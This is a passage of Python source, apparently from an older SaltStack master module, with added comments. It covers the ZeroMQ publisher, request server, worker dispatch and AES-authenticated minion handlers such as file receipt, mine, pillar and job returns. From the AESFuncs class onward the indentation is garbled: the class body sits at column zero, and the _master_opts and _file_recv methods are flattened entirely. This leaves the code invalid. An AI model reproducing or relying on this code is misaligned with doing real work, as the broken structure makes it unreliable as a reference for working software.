                    ' '.join(self.opts['fileserver_backend'])
                )
            )
        if not self.opts['fileserver_backend']:
            errors.append('No fileserver backends are configured')
        if errors:
            for error in errors:
                log.error(error)
            log.error('Master failed pre flight checks, exiting\n')
            sys.exit(1)

    def start(self):
        '''
        Turn on the master server components
        '''
        self._pre_flight()
        log.info(
            'salt-master is starting as user \'{0}\''.format(getpass.getuser())
        )
        enable_sigusr1_handler()
        self.__set_max_open_files()
        # Run the passive maintenance loop in its own process.
        clear_old_jobs_proc = multiprocessing.Process(
            target=self._clear_old_jobs)
        clear_old_jobs_proc.start()
        reqserv = ReqServer(
            self.opts,
            self.crypticle,
            self.key,
            self.master_key)
        reqserv.start_publisher()
        reqserv.start_event_publisher()
        reqserv.start_reactor()

        def sigterm_clean(signum, frame):
            '''
            Cleaner method for stopping multiprocessing processes when a
            SIGTERM is encountered. This is required when running a salt
            master under a process minder like daemontools
            '''
            log.warn(
                'Caught signal {0}, stopping the Salt Master'.format(
                    signum
                )
            )
            clean_proc(clear_old_jobs_proc)
            clean_proc(reqserv.publisher)
            clean_proc(reqserv.eventpublisher)
            if hasattr(reqserv, 'reactor'):
                clean_proc(reqserv.reactor)
            for proc in reqserv.work_procs:
                clean_proc(proc)
            raise MasterExit
        signal.signal(signal.SIGTERM, sigterm_clean)

        try:
            # Blocks in the request server's device loop until interrupted.
            reqserv.run()
        except KeyboardInterrupt:
            # Shut the master down gracefully on SIGINT
            log.warn('Stopping the Salt Master')
            raise SystemExit('\nExiting on Ctrl-c')
class Publisher(multiprocessing.Process):
    '''
    The publishing interface, a simple zeromq publisher that sends out the
    commands.
    '''
    def __init__(self, opts):
        super(Publisher, self).__init__()
        # The master configuration options.
        self.opts = opts

    def run(self):
        '''
        Bind to the interface specified in the configuration file

        Runs a PUB socket facing the minions and a PULL socket facing the
        master; every package received on the PULL side is forwarded
        verbatim to the PUB side until interrupted.
        '''
        # Set up the context
        context = zmq.Context(1)
        # Prepare minion publish socket
        pub_sock = context.socket(zmq.PUB)
        # if 2.1 >= zmq < 3.0, we only have one HWM setting
        try:
            pub_sock.setsockopt(zmq.HWM, 1)
        # in zmq >= 3.0, there are separate send and receive HWM settings
        except AttributeError:
            pub_sock.setsockopt(zmq.SNDHWM, 1)
            pub_sock.setsockopt(zmq.RCVHWM, 1)
        if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
            # IPv6 sockets work for both IPv6 and IPv4 addresses
            pub_sock.setsockopt(zmq.IPV4ONLY, 0)
        pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
        # Prepare minion pull socket
        pull_sock = context.socket(zmq.PULL)
        pull_uri = 'ipc://{0}'.format(
            os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
        )
        # Start the minion command publisher
        log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
        pub_sock.bind(pub_uri)
        pull_sock.bind(pull_uri)
        # Restrict access to the socket (448 == 0o700: owner only).
        os.chmod(
            os.path.join(self.opts['sock_dir'], 'publish_pull.ipc'),
            448
        )

        try:
            while True:
                # Catch and handle EINTR from when this process is sent
                # SIGUSR1 gracefully so we don't choke and die horribly
                try:
                    package = pull_sock.recv()
                    pub_sock.send(package)
                except zmq.ZMQError as exc:
                    if exc.errno == errno.EINTR:
                        continue
                    raise exc
        except KeyboardInterrupt:
            # Close both sockets with a short linger so pending messages
            # cannot block shutdown, then tear down the context.
            if pub_sock.closed is False:
                pub_sock.setsockopt(zmq.LINGER, 1)
                pub_sock.close()
            if pull_sock.closed is False:
                pull_sock.setsockopt(zmq.LINGER, 1)
                pull_sock.close()
            if context.closed is False:
                context.term()
class ReqServer(object):
    '''
    Starts up the master request server, minions send results to this
    interface.
    '''
    def __init__(self, opts, crypticle, key, mkey):
        '''
        opts : dict
            Master configuration options.
        crypticle : salt.crypt.Crypticle
            AES codec shared with the workers.
        key : dict
            Per-user local client keys.
        mkey : salt.crypt.MasterKeys
            The master RSA keys.
        '''
        self.opts = opts
        self.master_key = mkey
        # BUGFIX: initialize here so destroy() (and therefore __del__)
        # cannot raise AttributeError when called before __bind() has
        # populated the worker list.
        self.work_procs = []
        self.context = zmq.Context(self.opts['worker_threads'])
        # Prepare the zeromq sockets
        self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
        self.clients = self.context.socket(zmq.ROUTER)
        if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
            # IPv6 sockets work for both IPv6 and IPv4 addresses
            self.clients.setsockopt(zmq.IPV4ONLY, 0)
        self.workers = self.context.socket(zmq.DEALER)
        self.w_uri = 'ipc://{0}'.format(
            os.path.join(self.opts['sock_dir'], 'workers.ipc')
        )
        # Prepare the AES key
        self.key = key
        self.crypticle = crypticle

    def __bind(self):
        '''
        Binds the reply server

        Starts the MWorker processes, then runs a zmq QUEUE device that
        shuttles requests between the ROUTER (minions) and the DEALER
        (workers) forever.
        '''
        # Remove a stale AES rotation drop file if one is present.
        dfn = os.path.join(self.opts['cachedir'], '.dfn')
        if os.path.isfile(dfn):
            try:
                os.remove(dfn)
            except os.error:
                pass
        log.info('Setting up the master communication server')
        self.clients.bind(self.uri)

        self.work_procs = []

        for ind in range(int(self.opts['worker_threads'])):
            self.work_procs.append(MWorker(self.opts,
                                           self.master_key,
                                           self.key,
                                           self.crypticle))

        for ind, proc in enumerate(self.work_procs):
            log.info('Starting Salt worker process {0}'.format(ind))
            proc.start()

        self.workers.bind(self.w_uri)

        while True:
            try:
                zmq.device(zmq.QUEUE, self.clients, self.workers)
            except zmq.ZMQError as exc:
                # Tolerate EINTR (e.g. from SIGUSR1) and resume the device.
                if exc.errno == errno.EINTR:
                    continue
                raise exc

    def start_publisher(self):
        '''
        Start the salt publisher interface
        '''
        # Start the publisher
        self.publisher = Publisher(self.opts)
        self.publisher.start()

    def start_event_publisher(self):
        '''
        Start the salt publisher interface
        '''
        # Start the publisher
        self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
        self.eventpublisher.start()

    def start_reactor(self):
        '''
        Start the reactor, but only if the reactor interface is configured
        '''
        if self.opts.get('reactor'):
            self.reactor = salt.utils.event.Reactor(self.opts)
            self.reactor.start()

    def run(self):
        '''
        Start up the ReqServer
        '''
        self.__bind()

    def destroy(self):
        '''
        Close the zmq sockets/context and terminate any live workers.
        '''
        if self.clients.closed is False:
            self.clients.setsockopt(zmq.LINGER, 1)
            self.clients.close()
        if self.workers.closed is False:
            self.workers.setsockopt(zmq.LINGER, 1)
            self.workers.close()
        if self.context.closed is False:
            self.context.term()
        # Also stop the workers
        for worker in self.work_procs:
            if worker.is_alive() is True:
                worker.terminate()

    def __del__(self):
        self.destroy()
class MWorker(multiprocessing.Process):
    '''
    The worker multiprocess instance to manage the backend operations for the
    salt master.
    '''
    def __init__(self,
                 opts,
                 mkey,
                 key,
                 crypticle):
        '''
        opts : dict
            Master configuration options.
        mkey : salt.crypt.MasterKeys
            The master RSA keys.
        key : dict
            Per-user local client keys.
        crypticle : salt.crypt.Crypticle
            AES codec for minion payloads.
        '''
        multiprocessing.Process.__init__(self)
        self.opts = opts
        self.serial = salt.payload.Serial(opts)
        self.crypticle = crypticle
        self.mkey = mkey
        self.key = key
        # mtime of the last AES drop file consumed; used by _update_aes().
        self.k_mtime = 0

    def __bind(self):
        '''
        Bind to the local port

        Connects a REP socket to the master's workers.ipc endpoint and
        serves decode -> dispatch -> encode request/reply cycles forever.
        '''
        context = zmq.Context(1)
        socket = context.socket(zmq.REP)
        w_uri = 'ipc://{0}'.format(
            os.path.join(self.opts['sock_dir'], 'workers.ipc')
        )
        log.info('Worker binding to socket {0}'.format(w_uri))
        try:
            socket.connect(w_uri)
            while True:
                try:
                    package = socket.recv()
                    # Pick up a rotated AES key before handling the payload.
                    self._update_aes()
                    payload = self.serial.loads(package)
                    ret = self.serial.dumps(self._handle_payload(payload))
                    socket.send(ret)
                # Properly handle EINTR from SIGUSR1
                except zmq.ZMQError as exc:
                    if exc.errno == errno.EINTR:
                        continue
                    raise exc
        # Changes here create a zeromq condition, check with thatch45 before
        # making any zeromq changes
        except KeyboardInterrupt:
            socket.close()

    def _handle_payload(self, payload):
        '''
        The _handle_payload method is the key method used to figure out what
        needs to be done with communication to the server

        Dispatches on payload['enc'] ('aes'/'pub'/'clear') to the matching
        handler; returns '' for payloads missing 'enc' or 'load'.
        '''
        try:
            key = payload['enc']
            load = payload['load']
        except KeyError:
            return ''
        return {'aes': self._handle_aes,
                'pub': self._handle_pub,
                'clear': self._handle_clear}[key](load)

    def _handle_clear(self, load):
        '''
        Take care of a cleartext command

        Refuses dunder-prefixed commands, otherwise calls the matching
        method on self.clear_funcs.
        '''
        log.info('Clear payload received with command {cmd}'.format(**load))
        if load['cmd'].startswith('__'):
            return False
        return getattr(self.clear_funcs, load['cmd'])(load)

    def _handle_pub(self, load):
        '''
        Handle a command sent via a public key pair

        NOTE: currently only logs the command and implicitly returns None.
        '''
        if load['cmd'].startswith('__'):
            return False
        log.info('Pubkey payload received with command {cmd}'.format(**load))

    def _handle_aes(self, load):
        '''
        Handle a command sent via an AES key

        Decrypts the load with the current crypticle and dispatches it
        through self.aes_funcs; returns '' when decryption fails and {}
        for loads without a 'cmd'.
        '''
        try:
            data = self.crypticle.loads(load)
        except Exception:
            return ''
        if 'cmd' not in data:
            log.error('Received malformed command {0}'.format(data))
            return {}
        log.info('AES payload received with command {0}'.format(data['cmd']))
        if data['cmd'].startswith('__'):
            return False
        return self.aes_funcs.run_func(data['cmd'], data)

    def _update_aes(self):
        '''
        Check to see if a fresh AES key is available and update the components
        of the worker

        Reads the .dfn drop file left by the key-rotation step and, if it
        is newer than the last one consumed, rebuilds the crypticle and
        pushes the new key into the clear/aes function handlers.
        '''
        dfn = os.path.join(self.opts['cachedir'], '.dfn')
        try:
            stats = os.stat(dfn)
        except os.error:
            return
        # 0100400 (py2 octal) == regular file with mode 0400; anything
        # else is treated as an invalid drop file.
        if stats.st_mode != 0100400:
            # Invalid dfn, return
            return
        if stats.st_mtime > self.k_mtime:
            # new key, refresh crypticle
            with salt.utils.fopen(dfn) as fp_:
                aes = fp_.read()
            # 76 is presumably the length of a generated key string; a
            # different length indicates a truncated/corrupt drop file.
            if len(aes) != 76:
                return
            self.crypticle = salt.crypt.Crypticle(self.opts, aes)
            self.clear_funcs.crypticle = self.crypticle
            self.clear_funcs.opts['aes'] = aes
            self.aes_funcs.crypticle = self.crypticle
            self.aes_funcs.opts['aes'] = aes
            self.k_mtime = stats.st_mtime

    def run(self):
        '''
        Start a Master Worker

        The function handlers are constructed here (in the child process)
        rather than in __init__ so they are not pickled across fork/spawn.
        '''
        self.clear_funcs = ClearFuncs(
            self.opts,
            self.key,
            self.mkey,
            self.crypticle)
        self.aes_funcs = AESFuncs(self.opts, self.crypticle)
        self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
    '''
    opts : dict
        Master configuration options.
    crypticle : salt.crypt.Crypticle
        AES codec used for minion payloads.
    '''
    self.opts = opts
    # Event bus used to re-fire minion returns/events on the master.
    self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
    self.serial = salt.payload.Serial(opts)
    self.crypticle = crypticle
    # Minion matcher, used for auth/targeting checks.
    self.ckminions = salt.utils.minions.CkMinions(opts)
    # Create the tops dict for loading external top data
    self.tops = salt.loader.tops(self.opts)
    # Make a client
    self.local = salt.client.LocalClient(self.opts['conf_file'])
    # Create the master minion to access the external job cache
    self.mminion = salt.minion.MasterMinion(
        self.opts,
        states=False,
        rend=False)
    self.__setup_fileserver()
def __setup_fileserver(self):
    '''
    Set the local file objects from the file server interface

    Binds bound methods of a Fileserver instance onto ``self`` so the
    AES dispatcher can expose them directly as payload handlers.
    '''
    fs_ = salt.fileserver.Fileserver(self.opts)
    self._serve_file = fs_.serve_file
    self._file_hash = fs_.file_hash
    self._file_list = fs_.file_list
    self._file_list_emptydirs = fs_.file_list_emptydirs
    self._dir_list = fs_.dir_list
    self._file_envs = fs_.envs
def __verify_minion(self, id_, token):
    '''
    Take a minion id and a string signed with the minion private key
    The string needs to verify as 'salt' with the minion public key

    id_ : str
        The claimed minion id; must pass valid_id().
    token : str
        Data encrypted with the minion's private key.

    Returns True only when the public key cached for ``id_`` decrypts
    ``token`` to the literal string 'salt'; False otherwise.
    '''
    if not salt.utils.verify.valid_id(self.opts, id_):
        return False
    pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
    with salt.utils.fopen(pub_path, 'r') as fp_:
        minion_pub = fp_.read()
    # M2Crypto loads public keys from files, so round-trip the cached
    # key through a temporary file.
    tmp_pub = salt.utils.mkstemp()
    with salt.utils.fopen(tmp_pub, 'w+') as fp_:
        fp_.write(minion_pub)

    pub = None
    try:
        pub = RSA.load_pub_key(tmp_pub)
    except RSA.RSAError as err:
        log.error('Unable to load temporary public key "{0}": {1}'
                  .format(tmp_pub, err))
    try:
        os.remove(tmp_pub)
        # BUGFIX: guard against ``pub`` being None when the key failed to
        # load above; previously this raised an uncaught AttributeError.
        if pub is not None and pub.public_decrypt(token, 5) == 'salt':
            return True
    except RSA.RSAError as err:
        log.error('Unable to decrypt token: {0}'.format(err))

    # BUGFIX: added the missing space between the two concatenated string
    # fragments ('...attempted to' 'communicate...').
    log.error('Salt minion claiming to be {0} has attempted to '
              'communicate with the master and could not be verified'
              .format(id_))
    return False
def __verify_minion_publish(self, clear_load):
    '''
    Verify that the passed information authorized a minion to execute

    Checks, in order: that peer publishing is configured, that the load
    carries all required keys, that the call is not a recursive publish,
    that the sending minion's token verifies, and finally that the
    configured peer rules allow the requested function/target.
    '''
    # Verify that the load is valid
    if 'peer' not in self.opts:
        return False
    if not isinstance(self.opts['peer'], dict):
        return False
    if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
        return False
    # If the command will make a recursive publish don't run
    if re.match('publish.*', clear_load['fun']):
        return False
    # Check the permissions for this minion
    if not self.__verify_minion(clear_load['id'], clear_load['tok']):
        # The minion is not who it says it is!
        # We don't want to listen to it!
        log.warn(
            (
                'Minion id {0} is not who it says it is and is attempting '
                'to issue a peer command'
            ).format(clear_load['id'])
        )
        return False
    # Collect the peer rules whose pattern matches this minion id.
    perms = []
    for match in self.opts['peer']:
        if re.match(match, clear_load['id']):
            # This is the list of funcs/modules!
            if isinstance(self.opts['peer'][match], list):
                perms.extend(self.opts['peer'][match])
    if ',' in clear_load['fun']:
        # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
        # Compound command: split fun and the per-function arg strings.
        clear_load['fun'] = clear_load['fun'].split(',')
        arg_ = []
        for arg in clear_load['arg']:
            arg_.append(arg.split())
        clear_load['arg'] = arg_
    good = self.ckminions.auth_check(
        perms,
        clear_load['fun'],
        clear_load['tgt'],
        clear_load.get('tgt_type', 'glob'))
    if not good:
        return False
    return True
def _ext_nodes(self, load):
    '''
    Return the results from an external node classifier if one is
    specified

    Returns a dict mapping environment -> list of classes, merging the
    (deprecated) ``external_nodes`` command output with any configured
    master_tops interfaces.  Returns {} on missing/invalid minion id.
    '''
    if 'id' not in load:
        log.error('Received call for external nodes without an id')
        return {}
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return {}
    ret = {}
    # The old ext_nodes method is set to be deprecated in 0.10.4
    # and should be removed within 3-5 releases in favor of the
    # "master_tops" system
    if self.opts['external_nodes']:
        if not salt.utils.which(self.opts['external_nodes']):
            log.error(('Specified external nodes controller {0} is not'
                       ' available, please verify that it is installed'
                       '').format(self.opts['external_nodes']))
            return {}
        # SECURITY NOTE: the command runs through the shell with the
        # minion id interpolated; load['id'] has passed valid_id() above,
        # but keep this in mind if valid_id's rules are ever relaxed.
        cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id'])
        ndata = yaml.safe_load(
            subprocess.Popen(
                cmd,
                shell=True,
                stdout=subprocess.PIPE
            ).communicate()[0])
        if 'environment' in ndata:
            env = ndata['environment']
        else:
            env = 'base'

        if 'classes' in ndata:
            if isinstance(ndata['classes'], dict):
                ret[env] = list(ndata['classes'])
            elif isinstance(ndata['classes'], list):
                ret[env] = ndata['classes']
            else:
                return ret
    # Evaluate all configured master_tops interfaces

    opts = {}
    grains = {}
    if 'opts' in load:
        opts = load['opts']
        if 'grains' in load['opts']:
            grains = load['opts']['grains']
    for fun in self.tops:
        # Only run tops modules that are explicitly enabled in the
        # master_tops configuration.
        if fun not in self.opts.get('master_tops', {}):
            continue
        try:
            ret.update(self.tops[fun](opts=opts, grains=grains))
        except Exception as exc:
            # If anything happens in the top generation, log it and move on
            log.error(
                'Top function {0} failed with error {1} for minion '
                '{2}'.format(
                    fun, exc, load['id']
                )
            )
    return ret
def _master_opts(self, load):
'''
Return the master options to the minion
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for env in envs:
if env not in file_roots:
file_roots[env] = []
mopts['file_roots'] = file_roots
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
return mopts
def _mine_get(self, load):
    '''
    Gathers the data from the specified minions' mine

    Returns a dict mapping minion id -> cached mine data for
    ``load['fun']``, for every minion matching ``load['tgt']``.
    Returns {} / partial results on missing keys or unreadable caches.
    '''
    if any(key not in load for key in ('id', 'tgt', 'fun')):
        return {}
    ret = {}
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return ret
    checker = salt.utils.minions.CkMinions(self.opts)
    minions = checker.check_minions(
        load['tgt'],
        load.get('expr_form', 'glob')
    )
    for minion in minions:
        mine = os.path.join(
            self.opts['cachedir'],
            'minions',
            minion,
            'mine.p')
        try:
            with salt.utils.fopen(mine) as fp_:
                fdata = self.serial.load(fp_).get(load['fun'])
                if fdata:
                    ret[minion] = fdata
        except Exception:
            # Missing or unreadable mine cache for this minion: skip it.
            continue
    return ret
def _mine(self, load):
    '''
    Return the mine data

    Persists ``load['data']`` into the minion's mine cache file
    (``<cachedir>/minions/<id>/mine.p``).  Unless ``load['clear']`` is
    set, the new data is merged over any existing cached dict.
    Returns True on success, False for invalid loads.
    '''
    if 'id' not in load or 'data' not in load:
        return False
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return False
    if self.opts.get('minion_data_cache', False) or self.opts.get('enforce_mine_cache', False):
        cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
        if not os.path.isdir(cdir):
            os.makedirs(cdir)
        datap = os.path.join(cdir, 'mine.p')
        if not load.get('clear', False):
            # Merge over the previously cached mine data.
            if os.path.isfile(datap):
                with salt.utils.fopen(datap, 'r') as fp_:
                    new = self.serial.load(fp_)
                if isinstance(new, dict):
                    new.update(load['data'])
                    load['data'] = new
        with salt.utils.fopen(datap, 'w+') as fp_:
            fp_.write(self.serial.dumps(load['data']))
    return True
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not self.opts['file_recv'] or os.path.isabs(load['path']):
return False
if os.path.isabs(load['path']) or '../' in load['path']:
# Can overwrite master files!!
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
load['path'])
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath):
mode = 'w'
else:
mode = 'w+'
with salt.utils.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(load['data'])
return True
def _pillar(self, load):
    '''
    Return the pillar data for the minion

    Compiles pillar from the minion's grains/env and, when
    ``minion_data_cache`` is enabled, also persists the grains+pillar
    snapshot to ``<cachedir>/minions/<id>/data.p``.  Returns False for
    invalid loads.
    '''
    if any(key not in load for key in ('id', 'grains', 'env')):
        return False
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return False
    pillar = salt.pillar.Pillar(
        self.opts,
        load['grains'],
        load['id'],
        load['env'],
        load.get('ext'))
    data = pillar.compile_pillar()
    if self.opts.get('minion_data_cache', False):
        # Cache the grains and compiled pillar for other master-side
        # consumers (e.g. targeting against cached data).
        cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
        if not os.path.isdir(cdir):
            os.makedirs(cdir)
        datap = os.path.join(cdir, 'data.p')
        with salt.utils.fopen(datap, 'w+') as fp_:
            fp_.write(
                self.serial.dumps(
                    {'grains': load['grains'],
                     'pillar': data})
                )
    return data
def _master_state(self, load):
    '''
    Call the master to compile a master side highstate.

    Returns False unless both the minion opts and grains are supplied.
    '''
    if any(key not in load for key in ('opts', 'grains')):
        return False
    minion_opts = load['opts']
    return salt.state.master_compile(
        self.opts,
        minion_opts,
        load['grains'],
        minion_opts['id'],
        minion_opts['environment'])
def _minion_event(self, load):
    '''
    Receive an event from the minion and fire it on the master event
    interface.

    Accepts either a batch under 'events' or a single 'tag'/'data'
    pair; returns False on malformed or unverifiable loads.
    '''
    if 'id' not in load:
        return False
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return False
    batched = 'events' in load
    if not batched and ('tag' not in load or 'data' not in load):
        # Neither a batch of events nor a single tag/data pair
        return False
    if batched:
        for event in load['events']:
            # Fire on the bare tag (old dup event) then the namespaced tag
            self.event.fire_event(event, event['tag'])
            self.event.fire_event(
                event, tagify([load['id'], event['tag']], 'minion'))
    else:
        tag = load['tag']
        self.event.fire_event(load, tag)  # old dup event
        self.event.fire_event(load, tagify([load['id'], tag], 'minion'))
    return True
def _return(self, load):
    '''
    Handle the return data sent from the minions

    Fires the return on the event bus, then persists it into the job
    cache (or an external job cache when configured).

    :param load: dict requiring 'return', 'jid' and 'id'; may carry
        'out' and 'nocache'.
    :returns: False on invalid/duplicate returns, otherwise None.
    '''
    # If the return data is invalid, just ignore it
    if any(key not in load for key in ('return', 'jid', 'id')):
        return False
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return False
    if load['jid'] == 'req':
        # The minion is returning a standalone job, request a jobid
        load['jid'] = salt.utils.prep_jid(
            self.opts['cachedir'],
            self.opts['hash_type'],
            load.get('nocache', False))
    log.info('Got return from {id} for job {jid}'.format(**load))
    # Events fire before any caching so listeners see the return even if
    # the cache write below fails
    self.event.fire_event(load, load['jid'])  # old dup event
    self.event.fire_event(load, tagify([load['jid'], 'ret', load['id']], 'job'))
    self.event.fire_ret_load(load)
    if self.opts['master_ext_job_cache']:
        # Master-side external job cache replaces the local cache entirely
        fstr = '{0}.returner'.format(self.opts['master_ext_job_cache'])
        self.mminion.returners[fstr](load)
        return
    # Local job cache disabled, or the minion-side ext_job_cache handles it
    if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
        return
    jid_dir = salt.utils.jid_dir(
        load['jid'],
        self.opts['cachedir'],
        self.opts['hash_type']
        )
    if not os.path.isdir(jid_dir):
        log.error(
            'An inconsistency occurred, a job was received with a job id '
            'that is not present on the master: {jid}'.format(**load)
        )
        return False
    if os.path.exists(os.path.join(jid_dir, 'nocache')):
        # The publisher asked for this jid not to be cached
        return
    hn_dir = os.path.join(jid_dir, load['id'])
    if not os.path.isdir(hn_dir):
        os.makedirs(hn_dir)
    # Otherwise the minion has already returned this jid and it should
    # be dropped
    else:
        log.error(
            'An extra return was detected from minion {0}, please verify '
            'the minion, this could be a replay attack'.format(
                load['id']
            )
        )
        return False
    self.serial.dump(
        load['return'],
        # Use atomic open here to avoid the file being read before it's
        # completely written to. Refs #1935
        salt.utils.atomicfile.atomic_open(
            os.path.join(hn_dir, 'return.p'), 'w+'
        )
    )
    if 'out' in load:
        self.serial.dump(
            load['out'],
            # Use atomic open here to avoid the file being read before
            # it's completely written to. Refs #1935
            salt.utils.atomicfile.atomic_open(
                os.path.join(hn_dir, 'out.p'), 'w+'
            )
        )
def _syndic_return(self, load):
    '''
    Receive a syndic minion return and format it to look like returns from
    individual minions.

    :param load: dict requiring 'return' (mapping of minion id ->
        return data), 'jid' and 'id' (the syndic's id); may carry
        'load' (original publish load) and 'out'.
    :returns: None on success/malformed input, False on verify failure.
    '''
    # Verify the load
    if any(key not in load for key in ('return', 'jid', 'id')):
        return None
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        return False
    # set the write flag
    jid_dir = salt.utils.jid_dir(
        load['jid'],
        self.opts['cachedir'],
        self.opts['hash_type']
        )
    if not os.path.isdir(jid_dir):
        os.makedirs(jid_dir)
    if 'load' in load:
        # Preserve the original publish load alongside the returns
        with salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+') as fp_:
            self.serial.dump(load['load'], fp_)
    # The write tag marks this syndic's return as in-flight; removed
    # below once every individual return has been processed
    wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id']))
    try:
        with salt.utils.fopen(wtag, 'w+') as fp_:
            fp_.write('')
    except (IOError, OSError):
        log.error(
            'Failed to commit the write tag for the syndic return, are '
            'permissions correct in the cache dir: {0}?'.format(
                self.opts['cachedir']
            )
        )
        return False
    # Format individual return loads
    for key, item in load['return'].items():
        ret = {'jid': load['jid'],
               'id': key,
               'return': item}
        if 'out' in load:
            ret['out'] = load['out']
        self._return(ret)
    if os.path.isfile(wtag):
        os.remove(wtag)
def minion_runner(self, clear_load):
    '''
    Execute a runner from a minion, return the runner's function data.

    The minion must pass __verify_minion and its id must match a
    peer_run pattern whose list of allowed functions matches the
    requested fun; otherwise an empty dict is returned.
    '''
    peer_run = self.opts.get('peer_run')
    if peer_run is None or not isinstance(peer_run, dict):
        return {}
    for required in ('fun', 'arg', 'id', 'tok'):
        if required not in clear_load:
            return {}
    if not self.__verify_minion(clear_load['id'], clear_load['tok']):
        # The minion is not who it says it is!
        # We don't want to listen to it!
        log.warn(
            'Minion id {0} is not who it says it is!'.format(
                clear_load['id']
            )
        )
        return {}
    # Union of every function pattern allowed for this minion id
    allowed = set()
    for pattern, funcs in self.opts['peer_run'].items():
        if re.match(pattern, clear_load['id']):
            # This is the list of funcs/modules!
            if isinstance(funcs, list):
                allowed.update(funcs)
    if not any(re.match(perm, clear_load['fun']) for perm in allowed):
        return {}
    # Prepare the runner object; note self.opts takes precedence over
    # the request-derived keys via update()
    runner_opts = {'fun': clear_load['fun'],
                   'arg': clear_load['arg'],
                   'id': clear_load['id'],
                   'doc': False,
                   'conf_file': self.opts['conf_file']}
    runner_opts.update(self.opts)
    return salt.runner.Runner(runner_opts).run()
def pub_ret(self, load):
    '''
    Request the return data from a specific jid, only allowed
    if the requesting minion also initiated the execution.

    :param load: dict requiring 'jid', 'id' and 'tok'
    :returns: the cached returns for the jid, or {} when the request is
        malformed, fails verification, or this minion did not publish
        the jid.
    '''
    if any(key not in load for key in ('jid', 'id', 'tok')):
        return {}
    if not self.__verify_minion(load['id'], load['tok']):
        # The minion is not who it says it is!
        # We don't want to listen to it!
        log.warn(
            'Minion id {0} is not who it says it is!'.format(
                load['id']
            )
        )
        return {}
    # Check that this minion can access this data: the publisher's id
    # was recorded under publish_auth when the jid was created
    auth_cache = os.path.join(
        self.opts['cachedir'],
        'publish_auth')
    if not os.path.isdir(auth_cache):
        os.makedirs(auth_cache)
    jid_fn = os.path.join(auth_cache, load['jid'])
    # Robustness fix: a missing auth file means this minion never
    # published the jid (or the cache was cleaned) -- deny the request
    # instead of raising IOError on open
    if not os.path.isfile(jid_fn):
        return {}
    with salt.utils.fopen(jid_fn, 'r') as fp_:
        if not load['id'] == fp_.read():
            return {}
    # Grab the latest and return
    return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
    '''
    Publish a command initiated from a minion, this method executes minion
    restrictions so that the minion publication will only work if it is
    enabled in the config.
    The configuration on the master allows minions to be matched to
    salt functions, so the minions can only publish allowed salt functions
    The config will look like this:
    peer:
        .*:
            - .*
    This configuration will enable all minions to execute all commands.
    peer:
        foo.example.com:
            - test.*
    This configuration will only allow the minion foo.example.com to
    execute commands from the test module
    '''
    if not self.__verify_minion_publish(clear_load):
        return {}
    # Build the publication payload from the vetted clear load
    load = {
        'fun': clear_load['fun'],
        'arg': clear_load['arg'],
        'expr_form': clear_load.get('tgt_type', 'glob'),
        'tgt': clear_load['tgt'],
        'ret': clear_load['ret'],
        'id': clear_load['id'],
    }
    if 'tgt_type' in clear_load:
        tgt_type = clear_load['tgt_type']
        if tgt_type.startswith('node'):
            # Nodegroup targeting: expand to the configured expression
            if clear_load['tgt'] not in self.opts['nodegroups']:
                return {}
            load['tgt'] = self.opts['nodegroups'][clear_load['tgt']]
            load['expr_form_type'] = 'compound'
            load['expr_form'] = tgt_type
        else:
            load['expr_form'] = tgt_type
    ret = {'jid': self.local.cmd_async(**load),
           'minions': self.ckminions.check_minions(
               clear_load['tgt'],
               load['expr_form'])}
    # Record which minion started this jid so only it may fetch returns
    auth_cache = os.path.join(
        self.opts['cachedir'],
        'publish_auth')
    if not os.path.isdir(auth_cache):
        os.makedirs(auth_cache)
    jid_fn = os.path.join(auth_cache, ret['jid'])
    with salt.utils.fopen(jid_fn, 'w+') as fp_:
        fp_.write(clear_load['id'])
    return ret
def minion_publish(self, clear_load):
    '''
    Publish a command initiated from a minion, this method executes minion
    restrictions so that the minion publication will only work if it is
    enabled in the config.
    The configuration on the master allows minions to be matched to
    salt functions, so the minions can only publish allowed salt functions
    The config will look like this:
    peer:
        .*:
            - .*
    This configuration will enable all minions to execute all commands.
    peer:
        foo.example.com:
            - test.*
    This configuration will only allow the minion foo.example.com to
    execute commands from the test module
    '''
    if not self.__verify_minion_publish(clear_load):
        return {}
    # Set up the publication payload
    load = {
        'fun': clear_load['fun'],
        'arg': clear_load['arg'],
